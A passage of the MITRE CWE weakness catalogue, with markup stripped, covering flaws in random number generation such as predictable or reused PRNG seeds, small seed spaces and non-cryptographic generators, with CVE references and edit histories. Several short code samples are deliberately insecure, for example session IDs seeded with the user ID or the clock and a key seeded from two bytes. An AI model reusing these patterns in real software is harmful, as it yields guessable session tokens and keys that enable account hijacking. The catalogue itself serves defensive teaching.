- - As of CWE 4.5, terminology related to randomness, entropy, and - predictability can vary widely. Within the developer and other - communities, "randomness" is used heavily. However, within - cryptography, "entropy" is distinct, typically implied as a - measurement. There are no commonly-used definitions, even within - standards documents and cryptography papers. Future versions of - CWE will attempt to define these terms and, if necessary, - distinguish between them in ways that are appropriate for - different communities but do not reduce the usability of CWE for - mapping, understanding, or other scenarios. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Background_Details, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Description, Likelihood_of_Exploit, Other_Notes, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-12-28 - updated Applicable_Platforms, Common_Consequences, Description, Observed_Examples, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2010-02-16 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Detection_Factors, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-06-23 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Functional_Areas, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Description, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Demonstrative_Examples, Maintenance_Notes, Observed_Examples - - Randomness and Predictability - - - - The software uses an algorithm or scheme that produces insufficient entropy, leaving patterns or clusters of values that are more likely to occur than others. - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Other - Bypass Protection Mechanism - Other - An attacker could guess the random numbers generated and could gain unauthorized access to a system if the random numbers are used for authentication and authorization. - - - - - Implementation - Determine the necessary entropy to adequately provide for randomness and predictability. This can be achieved by increasing the number of bits of objects such as keys and seeds. - - - - - This code generates a unique random identifier for a user's session. - - function generateSessionID($userID){srand($userID);return rand();} - - Because the seed for the PRNG is always the user's ID, the session ID will always be the same. An attacker could thus predict any user's session ID and potentially hijack the session. - This example also exhibits a Small Seed Space (CWE-339). - - - The following code uses a statistical PRNG to create a URL for a receipt that remains active for some period of time after a purchase. - - String GenerateReceiptURL(String baseUrl) {Random ranGen = new Random();ranGen.setSeed((new Date()).getTime());return(baseUrl + ranGen.nextInt(400000000) + ".html");} - - This code uses the Random.nextInt() function to generate "unique" identifiers for the receipt pages it generates. Because Random.nextInt() is a statistical PRNG, it is easy for an attacker to guess the strings it generates. Although the underlying design of the receipt system is also faulty, it would be more secure if it used a random number generator that did not produce predictable receipt identifiers, such as a cryptographic PRNG. - - - - - CVE-2001-0950 - Insufficiently random data used to generate session tokens using C rand(). Also, for certificate/key generation, uses a source that does not block when entropy is low. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0950 - - - CVE-2008-2108 - Chain: insufficient precision (CWE-1339) in - random-number generator causes some zero bits to be reliably - generated, reducing the amount of entropy (CWE-331) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108 - - - - - Insufficient Entropy - - - 11 - Brute Force - - - MSC32-C - Properly seed pseudorandom number generators - Exact - - - - - - - - - - As of CWE 4.5, terminology related to randomness, entropy, and - predictability can vary widely. Within the developer and other - communities, "randomness" is used heavily. However, within - cryptography, "entropy" is distinct, typically implied as a - measurement. There are no commonly-used definitions, even within - standards documents and cryptography papers. Future versions of - CWE will attempt to define these terms and, if necessary, - distinguish between them in ways that are appropriate for - different communities but do not reduce the usability of CWE for - mapping, understanding, or other scenarios. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Maintenance_Notes, Observed_Examples - - - - - The lack of entropy available for, or used by, a Pseudo-Random Number Generator (PRNG) can be a stability and security threat. - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Medium - - - Availability - DoS: Crash, Exit, or Restart - If a pseudo-random number generator is using a limited entropy source which runs out (if the generator fails closed), the program may pause or crash. - - - Access Control - Other - Bypass Protection Mechanism - Other - If a PRNG is using a limited entropy source which runs out, and the generator fails open, the generator could produce predictable random numbers. Potentially a weak source of random numbers could weaken the encryption method used for authentication of users. - - - - - Architecture and Design - Requirements - Libraries or Frameworks - Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C ("Approved Random Number Generators"). - - - Implementation - Consider a PRNG that re-seeds itself as needed from high-quality pseudo-random output, such as hardware devices. - - - Architecture and Design - When deciding which PRNG to use, look at its sources of entropy. Depending on what your security needs are, you may need to use a random number generator that always uses strong random data -- i.e., a random number generator that attempts to be strong but will fail in a weak way or will always provide some middle ground of protection through techniques like re-seeding. Generally, something that always provides a predictable amount of strength is preferable. - - - - - CVE-2019-1715 - security product has insufficient entropy in the DRBG, allowing collisions and private key discovery - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1715 - - - - - Insufficient entropy in PRNG - - - MSC02-J - Generate strong random numbers - - - - - - - - As of CWE 4.5, terminology related to randomness, entropy, and - predictability can vary widely. Within the developer and other - communities, "randomness" is used heavily. However, within - cryptography, "entropy" is distinct, typically implied as a - measurement. There are no commonly-used definitions, even within - standards documents and cryptography papers. Future versions of - CWE will attempt to define these terms and, if necessary, - distinguish between them in ways that are appropriate for - different communities but do not reduce the usability of CWE for - mapping, understanding, or other scenarios. - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated References - - - CWE Content Team - MITRE - 2021-07-20 - updated Maintenance_Notes - - - - - True random number generators (TRNG) generally have a limited source of entropy and therefore can fail or block. - The rate at which true random numbers can be generated is limited. It is important that one uses them only when they are needed for security. - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Low - - - Availability - DoS: Crash, Exit, or Restart - A program may crash or block if it runs out of random numbers. - - - - - Implementation - Rather than failing on a lack of random numbers, it is often preferable to wait for more numbers to be created. - - - - - This code uses a TRNG to generate a unique session id for new connections to a server: - - while (1){ - if (haveNewConnection()){if (hwRandom()){int sessionID = hwRandom();createNewConnection(sessionID);} } } - - - - - This code does not attempt to limit the number of new connections or make sure the TRNG can successfully generate a new random number. An attacker may be able to create many new connections and exhaust the entropy of the TRNG. The TRNG may then block and cause the program to crash or hang. - - - - - Failure of TRNG - - - MSC02-J - Generate strong random numbers - - - - - - - As of CWE 4.5, terminology related to randomness, entropy, and - predictability can vary widely. Within the developer and other - communities, "randomness" is used heavily. However, within - cryptography, "entropy" is distinct, typically implied as a - measurement. There are no commonly-used definitions, even within - standards documents and cryptography papers. Future versions of - CWE will attempt to define these terms and, if necessary, - distinguish between them in ways that are appropriate for - different communities but do not reduce the usability of CWE for - mapping, understanding, or other scenarios. - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Maintenance_Notes - - Failure of TRNG - Failure to Handle Insufficient Entropy in TRNG - - - - The number of possible random values is smaller than needed by the product, making it more susceptible to brute force attacks. - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Other - Bypass Protection Mechanism - Other - An attacker could easily guess the values used. This could lead to unauthorized access to a system if the seed is used for authentication and authorization. - - - - - Architecture and Design - Requirements - Libraries or Frameworks - Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C ("Approved Random Number Generators"). - - - - - The following XML example code is a deployment descriptor for a Java web application deployed on a Sun Java Application Server. This deployment descriptor includes a session configuration property for configuring the session ID length. - - <sun-web-app> - ...<session-config> - <session-properties><property name="idLengthBytes" value="8"><description>The number of bytes in this web module's session ID.</description></property></session-properties> - </session-config>... - </sun-web-app> - - This deployment descriptor has set the session ID length for this Java web application to 8 bytes (or 64 bits). The session ID length for Java web applications should be set to 16 bytes (128 bits) to prevent attackers from guessing and/or stealing a session ID and taking over a user's session. - Note for most application servers including the Sun Java Application Server the session ID length is by default set to 128 bits and should not be changed. And for many application servers the session ID length cannot be changed from this default setting. Check your application server documentation for the session ID length default setting and configuration options to ensure that the session ID length is set to 128 bits. - - - - - CVE-2002-0583 - Product uses 5 alphanumeric characters for filenames of expense claim reports, stored under web root. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0583 - - - CVE-2002-0903 - Product uses small number of random numbers for a code to approve an action, and also uses predictable new user IDs, allowing attackers to hijack new accounts. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0903 - - - CVE-2003-1230 - SYN cookies implementation only uses 32-bit keys, making it easier to brute force ISN. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1230 - - - CVE-2004-0230 - Complex predictability / randomness (reduced space). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0230 - - - - - Small Space of Random Values - - - - - - - - As of CWE 4.5, terminology related to randomness, entropy, and - predictability can vary widely. Within the developer and other - communities, "randomness" is used heavily. However, within - cryptography, "entropy" is distinct, typically implied as a - measurement. There are no commonly-used definitions, even within - standards documents and cryptography papers. Future versions of - CWE will attempt to define these terms and, if necessary, - distinguish between them in ways that are appropriate for - different communities but do not reduce the usability of CWE for - mapping, understanding, or other scenarios. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Maintenance_Notes - - - - - The software uses a Pseudo-Random Number Generator (PRNG) but does not correctly manage seeds. - - - PRNGs are deterministic and, while their output appears - random, they cannot actually create entropy. They rely on - cryptographically secure and unique seeds for entropy so - proper seeding is critical to the secure operation of the - PRNG. - - Management of seeds could be broken down into two main areas: - - - - (1) protecting seeds as cryptographic material (such as a cryptographic key); - - - (2) whenever possible, using a uniquely generated seed from - a cryptographically secure source - - - - PRNGs require a seed as input to generate a stream of - numbers that are functionally indistinguishable from - random numbers. While the output is, in many cases, - sufficient for cryptographic uses, the output of any - PRNG is directly determined by the seed provided as - input. If the seed can be ascertained by a third party, - the entire output of the PRNG can be made known to - them. As such, the seed should be kept secret and - should ideally not be able to be guessed. For example, - the current time may be a poor seed. Knowing the - approximate time the PRNG was seeded greatly reduces - the possible key space. - - - Seeds do not necessarily need to be unique, but reusing seeds may open up attacks if the seed is discovered. - - - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Other - Bypass Protection Mechanism - Other - If a PRNG is used incorrectly, such as using the same seed for each initialization or using a predictable seed, then an attacker may be able to easily guess the seed and thus the random numbers. This could lead to unauthorized access to a system if the seed is used for authentication and authorization. - - - - - CVE-2019-11495 - server uses erlang:now() to seed the PRNG, which - results in a small search space for potential random - seeds - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11495 - - - CVE-2018-12520 - Product's PRNG is not seeded for the generation of session IDs - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12520 - - - CVE-2016-10180 - Router's PIN generation is based on rand(time(0)) seeding. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10180 - - - - - PRNG Seed Error - - - - - - - As of CWE 4.5, terminology related to randomness, entropy, and - predictability can vary widely. Within the developer and other - communities, "randomness" is used heavily. However, within - cryptography, "entropy" is distinct, typically implied as a - measurement. There are no commonly-used definitions, even within - standards documents and cryptography papers. Future versions of - CWE will attempt to define these terms and, if necessary, - distinguish between them in ways that are appropriate for - different communities but do not reduce the usability of CWE for - mapping, understanding, or other scenarios. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, References, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Description, Modes_of_Introduction, Name, Relationships, Type - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Description, Maintenance_Notes, Observed_Examples - - PRNG Seed Error - - - - A Pseudo-Random Number Generator (PRNG) uses the same seed each time the product is initialized. - Given the deterministic nature of PRNGs, using the same seed for each initialization will lead to the same output in the same order. If an attacker can guess (or knows) the seed, then the attacker may be able to determine the random numbers that will be produced from the PRNG. - - - - - - - - - Architecture and Design - The developer might not consider the need to use new seeds during design. - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Other - Access Control - Other - Bypass Protection Mechanism - - - - - Architecture and Design - Do not reuse PRNG seeds. Consider a PRNG that periodically re-seeds itself as needed from a high quality pseudo-random output, such as hardware devices. - - - Architecture and Design - Requirements - Libraries or Frameworks - Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems, or use the more recent FIPS 140-3 [REF-1192] if possible. - - - - - The following code uses a statistical PRNG to generate account IDs. - - private static final long SEED = 1234567890;public int generateAccountID() {Random random = new Random(SEED);return random.nextInt();} - - Because the program uses the same seed value for every invocation of the PRNG, its values are predictable, making the system vulnerable to attack. - - - This code attempts to generate a unique random identifier for a user's session. - - function generateSessionID($userID){srand($userID);return rand();} - - Because the seed for the PRNG is always the user's ID, the session ID will always be the same. An attacker could thus predict any user's session ID and potentially hijack the session. - If the user IDs are generated sequentially, or otherwise restricted to a narrow range of values, then this example also exhibits a Small Seed Space (CWE-339). - - - - - Same Seed in PRNG - - - MSC02-J - Generate strong random numbers - - - - - - - - As of CWE 4.5, terminology related to randomness, entropy, and - predictability can vary widely. Within the developer and other - communities, "randomness" is used heavily. However, within - cryptography, "entropy" is distinct, typically implied as a - measurement. There are no commonly-used definitions, even within - standards documents and cryptography papers. Future versions of - CWE will attempt to define these terms and, if necessary, - distinguish between them in ways that are appropriate for - different communities but do not reduce the usability of CWE for - mapping, understanding, or other scenarios. - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Description, Modes_of_Introduction, Name, References, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, References - - Same Seed in PRNG - - - - A Pseudo-Random Number Generator (PRNG) is initialized from a predictable seed, such as the process ID or system time. - The use of predictable seeds significantly reduces the number of possible seeds that an attacker would need to test in order to predict which random numbers will be generated by the PRNG. - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Other - Varies by Context - - - - - Use non-predictable inputs for seed generation. - - - Architecture and Design - Requirements - Libraries or Frameworks - Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems, or use the more recent FIPS 140-3 [REF-1192] if possible. - - - Implementation - Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block. - - - - - Both of these examples use a statistical PRNG seeded with the current value of the system clock to generate a random number: - - Random random = new Random(System.currentTimeMillis());int accountID = random.nextInt(); - - - srand(time());int randNum = rand(); - - An attacker can easily predict the seed used by these PRNGs, and so also predict the stream of random numbers generated. Note these examples also exhibit CWE-338 (Use of Cryptographically Weak PRNG). - - - - - CVE-2019-11495 - server uses erlang:now() to seed the PRNG, which - results in a small search space for potential random - seeds - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11495 - - - CVE-2008-0166 - The removal of a couple lines of code caused Debian's OpenSSL Package to only use the current process ID for seeding a PRNG - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166 - - - CVE-2016-10180 - Router's PIN generation is based on rand(time(0)) seeding. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10180 - - - CVE-2018-9057 - cloud provider product uses a non-cryptographically secure PRNG and seeds it with the current time - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9057 - - - - - Predictable Seed in PRNG - - - MSC02-J - Generate strong random numbers - - - - - - - - - As of CWE 4.5, terminology related to randomness, entropy, and - predictability can vary widely. Within the developer and other - communities, "randomness" is used heavily. However, within - cryptography, "entropy" is distinct, typically implied as a - measurement. There are no commonly-used definitions, even within - standards documents and cryptography papers. Future versions of - CWE will attempt to define these terms and, if necessary, - distinguish between them in ways that are appropriate for - different communities but do not reduce the usability of CWE for - mapping, understanding, or other scenarios. - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples, Description, Modes_of_Introduction, Name, References, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Maintenance_Notes, Observed_Examples, Potential_Mitigations, References - - Predictable Seed in PRNG - - - - The product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG's algorithm is not cryptographically strong. - - When a non-cryptographic PRNG is used in a cryptographic context, it can expose the cryptography to certain types of attacks. - Often a pseudo-random number generator (PRNG) is not designed for cryptography. Sometimes a mediocre source of randomness is sufficient or preferable for algorithms that use random numbers. Weak generators generally take less processing power and/or do not use the precious, finite, entropy sources on a system. While such PRNGs might have very useful features, these same features could be used to break the cryptography. - - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Medium - - - Access Control - Bypass Protection Mechanism - If a PRNG is used for authentication and authorization, such as a session ID or a seed for generating a cryptographic key, then an attacker may be able to easily guess the ID or cryptographic key and gain access to restricted functionality. - - - - - Implementation - Use functions or hardware which use a hardware-based random number generation for all crypto. This is the recommended solution. Use CyptGenRandom on Windows, or hw_rand() on Linux. - - - - - Both of these examples use a statistical PRNG seeded with the current value of the system clock to generate a random number: - - Random random = new Random(System.currentTimeMillis());int accountID = random.nextInt(); - - - srand(time());int randNum = rand(); - - The random number functions used in these examples, rand() and Random.nextInt(), are not considered cryptographically strong. An attacker may be able to predict the random numbers generated by these functions. Note that these example also exhibit CWE-337 (Predictable Seed in PRNG). - - - - - CVE-2009-3278 - Crypto product uses rand() library function to generate a recovery key, making it easier to conduct brute force attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3278 - - - CVE-2009-3238 - Random number generator can repeatedly generate the same value. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3238 - - - CVE-2009-2367 - Web application generates predictable session IDs, allowing session hijacking. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2367 - - - CVE-2008-0166 - SSL library uses a weak random number generator that only generates 65,536 unique keys. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166 - - - - - Non-cryptographic PRNG - - - MSC30-C - Do not use the rand() function for generating pseudorandom numbers - CWE More Abstract - - - - - - - - As of CWE 4.5, terminology related to randomness, entropy, and - predictability can vary widely. Within the developer and other - communities, "randomness" is used heavily. However, within - cryptography, "entropy" is distinct, typically implied as a - measurement. There are no commonly-used definitions, even within - standards documents and cryptography papers. Future versions of - CWE will attempt to define these terms and, if necessary, - distinguish between them in ways that are appropriate for - different communities but do not reduce the usability of CWE for - mapping, understanding, or other scenarios. - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Applicable_Platforms, Description, Name, Other_Notes - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Description, Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2021-07-20 - updated Maintenance_Notes - - Non-cryptographic PRNG - Use of Cryptographically Weak PRNG - - - - A Pseudo-Random Number Generator (PRNG) uses a relatively small seed space, which makes it more susceptible to brute force attacks. - - PRNGs are entirely deterministic once seeded, so it should be extremely difficult to guess the seed. If an attacker can collect the outputs of a PRNG and then brute force the seed by trying every possibility to see which seed matches the observed output, then the attacker will know the output of any subsequent calls to the PRNG. A small seed space implies that the attacker will have far fewer possible values to try to exhaust all possibilities. - - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Other - Varies by Context - - - - - Architecture and Design - Use well vetted pseudo-random number generating algorithms with adequate length seeds. Pseudo-random number generators can produce predictable numbers if the generator is known and the seed can be guessed. A 256-bit seed is a good starting point for producing a "random enough" number. - - - Architecture and Design - Requirements - Libraries or Frameworks - Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems, or use the more recent FIPS 140-3 [REF-1192] if possible. - - - - - This code grabs some random bytes and uses them for a seed in a PRNG, in order to generate a new cryptographic key. - - - # getting 2 bytes of randomness for the seeding the PRNG - seed = os.urandom(2) - random.seed(a=seed) - key = random.getrandbits(128) - - - Since only 2 bytes is used as a seed, an attacker will only need to guess 2^16 (65,536) values before being able to replicate the state of the PRNG. - - - - - CVE-2019-10908 - product generates passwords via org.apache.commons.lang.RandomStringUtils, which uses java.util.Random internally. This PRNG has only a 48-bit seed. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10908 - - - - - Small Seed Space in PRNG - - - - - - - - This entry may have a chaining relationship with predictable from observable state (CWE-341). - As of CWE 4.5, terminology related to randomness, entropy, and - predictability can vary widely. Within the developer and other - communities, "randomness" is used heavily. However, within - cryptography, "entropy" is distinct, typically implied as a - measurement. There are no commonly-used definitions, even within - standards documents and cryptography papers. Future versions of - CWE will attempt to define these terms and, if necessary, - distinguish between them in ways that are appropriate for - different communities but do not reduce the usability of CWE for - mapping, understanding, or other scenarios. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Maintenance_Notes, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Observed_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 